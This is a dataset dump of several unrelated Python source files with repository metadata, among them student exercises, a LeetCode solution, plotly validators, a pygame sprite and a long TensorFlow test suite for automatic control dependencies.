d3c3b2c4176952ecea3c6ff9256d43ff609b77e2 | 3ab494cac87a9f3c5ba17c903ffdbba7e72c305f | /algorithm/보충/venv/Scripts/easy_install-3.6-script.py | 3eb42c94cecd12c6de91863c2165be01675d4f1b | [] | no_license | sochic2/TIL | 6036cae002ce4c4ba5e7d2175e668c664de209de | eb2709f5ac1a4b9c79dda0e647f14044c7a4fb6e | refs/heads/master | 2023-01-10T03:51:14.057387 | 2022-12-21T01:27:38 | 2022-12-21T01:27:38 | 162,229,719 | 4 | 1 | null | 2023-01-09T11:56:04 | 2018-12-18T04:23:54 | Python | WINDOWS-1256 | Python | false | false | 476 | py | #!C:\Users\student\Desktop\namki\TIL\algorithm\؛¸أو\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"[email protected]"
] | |
f3bdb90d97b79633bf441562fe7407603ed74a15 | 3f1afc627ac4ba3b870cefd95b307e2194f3c377 | /Gabarito/Exercícios/Lista02/questao04.py | 4b57503465ad7968d3e8353e29a5897318e69dd7 | [] | no_license | valeriacavalcanti/IP-2019.2 | 5e800430131c80979aadbc3481f0bcb07c08921f | 8d796bea2a4892f38c5278069233f5bbb00d4510 | refs/heads/master | 2020-08-06T22:24:34.416129 | 2019-12-11T15:02:44 | 2019-12-11T15:02:44 | 213,180,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | n1 = 0
n2 = 1
qtde = int(input('Quantidade: '))
for i in range(qtde):
print(n1, '', end='')
n1, n2 = n2, n1
n2 = n1 + n2
print() | [
"[email protected]"
] | |
12a2f8fa71fdc51df7e8e9b65d16e8c5fbee75ca | 7ec91f8b8342b1ab62d315424f43588a13dda307 | /solu/225. Implement Stack using Queues.py | 2408835fcf98d461605bfbc7acf78815f82dad2a | [] | no_license | coolmich/py-leetcode | bbd001a1cb41b13cd0515d1b764ec327dfaaa03c | 3129438b032d3aeb87c6ac5c4733df0ebc1272ba | refs/heads/master | 2020-05-21T08:44:46.564419 | 2016-09-15T15:45:08 | 2016-09-15T15:45:08 | 60,917,444 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 741 | py | from collections import deque
class Stack(object):
def __init__(self):
"""
initialize your data structure here.
"""
self.q = deque([])
self.sz = 0
def push(self, x):
"""
:type x: int
:rtype: nothing
"""
self.q.append(x)
self.sz += 1
n = self.sz
while n > 1:
self.q.append(self.q.popleft())
n -= 1
def pop(self):
"""
:rtype: nothing
"""
self.sz -= 1
self.q.popleft()
def top(self):
"""
:rtype: int
"""
return self.q[0]
def empty(self):
"""
:rtype: bool
"""
return self.sz == 0
| [
"[email protected]"
] | |
fdef99f1e3c57a1ebf30037d68abb0430da91add | 7a09af404f29389504742a3d5f1727bfbe562750 | /TrekBot_WS/build/zed-ros-wrapper/tutorials/zed_tracking_sub_tutorial/catkin_generated/pkg.develspace.context.pc.py | 4a1d4c47aeb7e2baacd1ef341fc620353217ace4 | [
"MIT"
] | permissive | Rafcin/TrekBot | 4baa2ed93b90920b36adba0b72384ac320d2de01 | d3dc63e6c16a040b16170f143556ef358018b7da | refs/heads/master | 2020-03-30T02:15:35.361254 | 2018-12-14T03:30:25 | 2018-12-14T03:30:25 | 150,622,252 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "zed_tracking_sub_tutorial"
PROJECT_SPACE_DIR = "/xavier_ssd/TrekBot/TrekBot_WS/devel"
PROJECT_VERSION = "2.6.0"
| [
"[email protected]"
] | |
b8e63a9fbc5a3b0416566a73132e8279c3cc3cd3 | 010279e2ba272d09e9d2c4e903722e5faba2cf7a | /contrib/python/plotly/py2/plotly/validators/contourcarpet/contours/labelfont/__init__.py | c81c9ce64d4004929b30ba1d1131b7bc3d944506 | [
"MIT",
"Apache-2.0"
] | permissive | catboost/catboost | 854c1a1f439a96f1ae6b48e16644be20aa04dba2 | f5042e35b945aded77b23470ead62d7eacefde92 | refs/heads/master | 2023-09-01T12:14:14.174108 | 2023-09-01T10:01:01 | 2023-09-01T10:22:12 | 97,556,265 | 8,012 | 1,425 | Apache-2.0 | 2023-09-11T03:32:32 | 2017-07-18T05:29:04 | Python | UTF-8 | Python | false | false | 1,637 | py | import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name="size",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="family",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
role=kwargs.pop("role", "style"),
strict=kwargs.pop("strict", True),
**kwargs
)
import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name="color",
parent_name="contourcarpet.contours.labelfont",
**kwargs
):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "style"),
role=kwargs.pop("role", "style"),
**kwargs
)
| [
"[email protected]"
] | |
3ff051a1e0fbccee71a8f6395bf9a393a6840ce8 | a5f31704d64de5ceeab45811b94f43c7b9b3604e | /bullet.py | 33c7318f91337b06fd9345fe594b6a2a298f182a | [] | no_license | Zhaisan/PythonDev | 6788908f85a628bfa5340185b27e44e5fec4b3a4 | 43aca96d9df6b97651fdf16cf7b3e6d193a1c6b9 | refs/heads/master | 2023-05-09T07:19:37.364294 | 2021-05-31T14:43:49 | 2021-05-31T14:43:49 | 237,256,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | bullet.py
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
def __init__(self, ai_settings, screen, ship):
# объект пули в текущей позиции корабля."""
super(Bullet, self).__init__()
self.screen = screen
# Создание пули в позиции (0,0) и назначение правильной позиции.
self.rect = pygame.Rect(0, 0, ai_settings.bullet_width,ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
self.y = float(self.rect.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
| [
"[email protected]"
] | |
f7392bf4d8322e9dbd1a06a364b5a14d802954af | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/b2dac080496d9534c6661a7e47f687373dd8c038-<test_zero_dim>-bug.py | 9c37521a67795f28c566fc1c46c3c2af88c2f14b | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | def test_zero_dim(self):
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 0, 0), expected_shape=(4, 2, 1))
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 0, 0), expected_shape=(4, 2, 1), arg_shape=False)
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 2, 1), expected_shape=(4, 2, 1))
_test_reshape(old_shape=(4, 2, 1), new_shape=(0, 2, 1), expected_shape=(4, 2, 1), arg_shape=False) | [
"[email protected]"
] | |
0097e70179f08323f50cb8ac93f084e5942981e7 | 8011631d92166efbf5ecb2c01d02189363a174ec | /subtraction.py | 73fa13df83a5819e234afbd70eeb50f2987319f1 | [] | no_license | tsungic/w19a | e2087311a0730d7b0ea799e2856ddad54f8544d3 | 83ea4d637f9560adeefe3b3617cbf4af4f7803e8 | refs/heads/master | 2023-02-28T20:53:48.523902 | 2021-02-11T05:15:30 | 2021-02-11T05:15:30 | 337,906,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | def subtract(x,y):
return x-y | [
"[email protected]"
] | |
5e6f738c7e99d9a32a44ca6b73d5575c431aab6b | d11c6b6b9762acda60fc094b7e8ad2754fd9b700 | /tensorflow/python/framework/auto_control_deps_test.py | 1cd10964070a486f246f6a84cafb62d9e9d18f7e | [
"MIT",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | jprosser/tensorflow | 28ba58a811ac92e0e15aab518512cd46fbef90ea | c3f73a5f946c63b238f5412717f6aae4d4d6bf4b | refs/heads/master | 2021-10-07T16:53:58.923779 | 2021-10-01T17:23:25 | 2021-10-01T17:28:00 | 219,566,947 | 0 | 1 | Apache-2.0 | 2019-11-04T18:16:54 | 2019-11-04T18:16:53 | null | UTF-8 | Python | false | false | 27,990 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import itertools
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function
from tensorflow.python.framework import auto_control_deps as acd
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import gen_sendrecv_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import momentum
class AutomaticControlDependenciesTest(test.TestCase):
def testBasic(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
v.assign(v + 1)
v.assign(2 * v)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val, 4.0)
def testNoControlDepsBetweenVariableReads(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableReadThenWrite(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
# Writes should have control deps from "all" reads since last write
# or start of the code block.
self.assertIn(read_op1, assign_op.control_inputs)
self.assertIn(read_op2, assign_op.control_inputs)
# There should be no control deps between reads.
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableWriteThenRead(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies():
assign_op = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
# Reads should have a control dep from the last write.
self.assertIn(assign_op, read_op1.control_inputs)
self.assertIn(assign_op, read_op2.control_inputs)
# There should be no control deps between reads.
self.assertNotIn(read_op1, read_op2.control_inputs)
self.assertNotIn(read_op2, read_op1.control_inputs)
def testVariableReadsInOpsWithMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
read_op = gen_resource_variable_ops.read_variable_op(v.handle,
v.dtype).op
# Read ops get added to control outputs only if they have consumers.
c.mark_as_return(read_op.outputs[0])
self.assertIn(read_op, c.ops_which_must_run)
def testVariableMultipleReadsAndWrites(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
# 2 reads -> 2 writes -> 2 reads -> 2 writes.
read_op1 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op2 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op1 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
assign_op2 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
read_op3 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
read_op4 = gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype).op
assign_op3 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
assign_op4 = gen_resource_variable_ops.assign_variable_op(
v.handle, v + 1)
# Read ops get added to control outputs only if they have consumers.
c.mark_as_return(read_op1.outputs[0])
c.mark_as_return(read_op2.outputs[0])
c.mark_as_return(read_op3.outputs[0])
c.mark_as_return(read_op4.outputs[0])
# Verify the control edges.
self.assertIn(read_op1, assign_op1.control_inputs)
self.assertIn(read_op2, assign_op1.control_inputs)
self.assertIn(assign_op1, assign_op2.control_inputs)
self.assertIn(assign_op2, read_op3.control_inputs)
self.assertIn(assign_op2, read_op4.control_inputs)
self.assertIn(read_op3, assign_op3.control_inputs)
self.assertIn(read_op4, assign_op3.control_inputs)
self.assertIn(assign_op3, assign_op4.control_inputs)
# There should be no control deps between reads.
read_ops = [read_op1, read_op2, read_op3, read_op4]
for src_op, tgt_op in itertools.product(read_ops, read_ops):
self.assertNotIn(src_op, tgt_op.control_inputs)
# Reads must be in `ops_which_must_run`.
self.assertIn(read_op1, c.ops_which_must_run)
self.assertIn(read_op2, c.ops_which_must_run)
self.assertIn(read_op3, c.ops_which_must_run)
self.assertIn(read_op4, c.ops_which_must_run)
# Last write must be in `ops_which_must_run`.
self.assertIn(assign_op4, c.ops_which_must_run)
def testSendInOpsWithMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
with acd.AutomaticControlDependencies() as c:
send_op = gen_sendrecv_ops.send(v, "x", "/", 0, "/")
# Send must be in `ops_which_must_run`.
self.assertIn(send_op, c.ops_which_must_run)
def _testVariableReadInFunctionalOp(self, build_functional_op, op_type):
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@def_function.function
def read_var_in_while():
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read1")
result = build_functional_op(v)
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read2")
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return result
func_graph = read_var_in_while.get_concrete_function().graph
assert len(func_graph.inputs) == 1
def get_op(op_type, sub_name):
operations = [
op for op in func_graph.get_operations()
if op.type == op_type and sub_name in op.name
]
assert len(operations) == 1
return operations[0]
read1 = get_op("ReadVariableOp", "read1")
functional_op = get_op(op_type, "")
read2 = get_op("ReadVariableOp", "read2")
assign_op = get_op("AssignVariableOp", "")
# Since the functional op only has reads, previous reads e.g. read1 do not\
# have a control edge to it and next future reads e.g. read2 do not have a
# control edge from it.
self.assertNotIn(read1, functional_op.control_inputs)
self.assertNotIn(functional_op, read2.control_inputs)
self.assertIn(read1, assign_op.control_inputs)
self.assertIn(read2, assign_op.control_inputs)
self.assertIn(functional_op, assign_op.control_inputs)
def testVariableReadInWhileLoop(self):
def build_functional_op(v):
def body(_):
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
self._testVariableReadInFunctionalOp(build_functional_op, "While")
def testVariableReadInCondTrueBranch(self):
def build_functional_op(v):
def then_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
self._testVariableReadInFunctionalOp(build_functional_op, "If")
def testVariableReadInCondFalseBranch(self):
def build_functional_op(v):
def then_branch():
return array_ops.zeros([], v.dtype)
def else_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.cond(
constant_op.constant(False), then_branch, else_branch)
self._testVariableReadInFunctionalOp(build_functional_op, "If")
def testVariableReadInCaseBranch0(self):
def build_functional_op(v):
def branch0():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def branch1():
return array_ops.zeros([], v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableReadInFunctionalOp(build_functional_op, "Case")
def testVariableReadInCaseBranch1(self):
def build_functional_op(v):
def branch0():
return array_ops.zeros([], v.dtype)
def branch1():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableReadInFunctionalOp(build_functional_op, "Case")
def testVariableReadInFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInNestedFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInWhileInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
def body(_):
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableReadInCondInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_read():
@def_function.function
def inner_fn():
def then_branch():
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
return inner_fn()
return fn_with_read()
self._testVariableReadInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def _testVariableWriteInFunctionalOp(self, build_functional_op, op_type):
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@def_function.function
def write_var_in_while():
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read1")
result = build_functional_op(v)
gen_resource_variable_ops.read_variable_op(
v.handle, v.dtype, name="read2")
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return result
func_graph = write_var_in_while.get_concrete_function().graph
assert len(func_graph.inputs) == 1
def get_op(op_type, sub_name):
operations = [
op for op in func_graph.get_operations()
if op.type == op_type and sub_name in op.name
]
assert len(operations) == 1
return operations[0]
read1 = get_op("ReadVariableOp", "read1")
functional_op = get_op(op_type, "")
read2 = get_op("ReadVariableOp", "read2")
assign_op = get_op("AssignVariableOp", "")
# Since the While has writes, it has control edges from previous reads
# e.g. `read1` and to future reads(`read2`) and writes(`assign_op`).
self.assertIn(read1, functional_op.control_inputs)
self.assertIn(functional_op, read2.control_inputs)
self.assertIn(read2, assign_op.control_inputs)
self.assertIn(functional_op, assign_op.control_inputs)
def testVariableWriteInWhileLoop(self):
def build_functional_op(v):
def body(_):
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
self._testVariableWriteInFunctionalOp(build_functional_op, "While")
def testVariableWriteInCondTrueBranch(self):
def build_functional_op(v):
def then_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
self._testVariableWriteInFunctionalOp(build_functional_op, "If")
def testVariableWriteInCondFalseBranch(self):
def build_functional_op(v):
def then_branch():
return array_ops.zeros([], v.dtype)
def else_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.cond(
constant_op.constant(False), then_branch, else_branch)
self._testVariableWriteInFunctionalOp(build_functional_op, "If")
def testVariableWriteInCaseBranch0(self):
def build_functional_op(v):
def branch0():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def branch1():
return array_ops.zeros([], v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableWriteInFunctionalOp(build_functional_op, "Case")
def testVariableWriteInCaseBranch1(self):
def build_functional_op(v):
def branch0():
return array_ops.zeros([], v.dtype)
def branch1():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.switch_case(
constant_op.constant(0), [branch0, branch1])
self._testVariableWriteInFunctionalOp(build_functional_op, "Case")
def testVariableWriteInFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableWriteInNestedFunction(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableWriteInWhileInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
def body(_):
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
return control_flow_ops.while_loop(
lambda i: True, body, [0.0], maximum_iterations=1)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
def testVariableWriteInCondInInnerFunc(self):
def build_functional_op(v):
@def_function.function
def fn_with_write():
@def_function.function
def inner_fn():
def then_branch():
gen_resource_variable_ops.assign_variable_op(v.handle, v + 1)
return gen_resource_variable_ops.read_variable_op(v.handle, v.dtype)
def else_branch():
return array_ops.zeros([], v.dtype)
return control_flow_ops.cond(
constant_op.constant(True), then_branch, else_branch)
return inner_fn()
return fn_with_write()
self._testVariableWriteInFunctionalOp(build_functional_op,
"StatefulPartitionedCall")
@test_util.run_v1_only("b/120545219")
def testCondMustRun(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1)
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 5.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 6.0)
@test_util.run_v1_only("b/120545219")
def testCondMustRunSeparateRead(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1)
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
one = constant_op.constant(1.0)
one = c.mark_as_return(one)
one.eval(feed_dict={p: False})
self.assertAllEqual(v.read_value(), 5.0)
one.eval(feed_dict={p: True})
self.assertAllEqual(v.read_value(), 6.0)
@test_util.run_v1_only("b/120545219")
def testCondNested(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
q = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
v.assign(v + 1, name="true")
return 1.0
def false_fn():
def inner_true_fn():
v.assign(v * 2, name="false_true")
return 2.0
def inner_false_fn():
v.assign(v * 3, name="false_false")
return 3.0
control_flow_ops.cond(q, inner_true_fn, inner_false_fn)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
with ops.name_scope("final"):
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False, q: False}), 3.0)
self.assertAllEqual(val.eval(feed_dict={p: False, q: True}), 6.0)
self.assertAllEqual(val.eval(feed_dict={p: True, q: True}), 7.0)
self.assertAllEqual(val.eval(feed_dict={p: True, q: False}), 8.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranch(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 5.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 5.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranchUpdateBefore(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
v.assign(v * 2)
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 6.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 12.0)
@test_util.run_v1_only("b/120545219")
def testCondOneBranchUpdateAfter(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
p = array_ops.placeholder(dtype=dtypes.bool)
with acd.AutomaticControlDependencies() as c:
def true_fn():
return 0.0
def false_fn():
v.assign(v + 4)
return 1.0
control_flow_ops.cond(p, true_fn, false_fn)
v.assign(v * 2)
val = v.read_value()
val = c.mark_as_return(val)
self.assertAllEqual(val.eval(feed_dict={p: False}), 10.0)
self.assertAllEqual(val.eval(feed_dict={p: True}), 20.0)
def testDefunWhileLoopWithCapturedLoopVars(self):
n = 3
x = constant_op.constant(list(range(n)))
@function.defun
def loop():
c = lambda i, x: i < n
b = lambda i, x: (i + 1, x + 1)
i, out = control_flow_ops.while_loop(c, b, (0, x))
return i, out
i, out = loop()
self.assertEqual(int(i), 3)
self.assertAllEqual(out, [3, 4, 5])
def testDecorator(self):
with context.graph_mode(), self.cached_session():
v = resource_variable_ops.ResourceVariable(1.0)
self.evaluate(variables.global_variables_initializer())
@acd.automatic_control_dependencies
def f():
v.assign(v + 1)
v.assign(2 * v)
return v.read_value()
self.assertAllEqual(f(), 4.0)
def testOptimizerInDefun(self):
def loss(v):
return v**2
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
@function.defun
def train():
self.v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(loss)(self.v)
optimizer.apply_gradients(grad)
return self.v.read_value()
value = train()
self.assertEqual(value.numpy(), -1.0)
def testReturningNonTensorRaisesError(self):
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
optimizer.apply_gradients = function.defun(optimizer.apply_gradients)
v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(lambda v: v**2)(v)
with self.assertRaisesRegex(TypeError,
".*must return zero or more Tensors.*"):
# TODO(akshayka): We might want to allow defun-ing Python functions
# that return operations (and just execute the op instead of running it).
optimizer.apply_gradients(grad)
# TODO(b/111663004): This should work when the outer context is graph
# building.
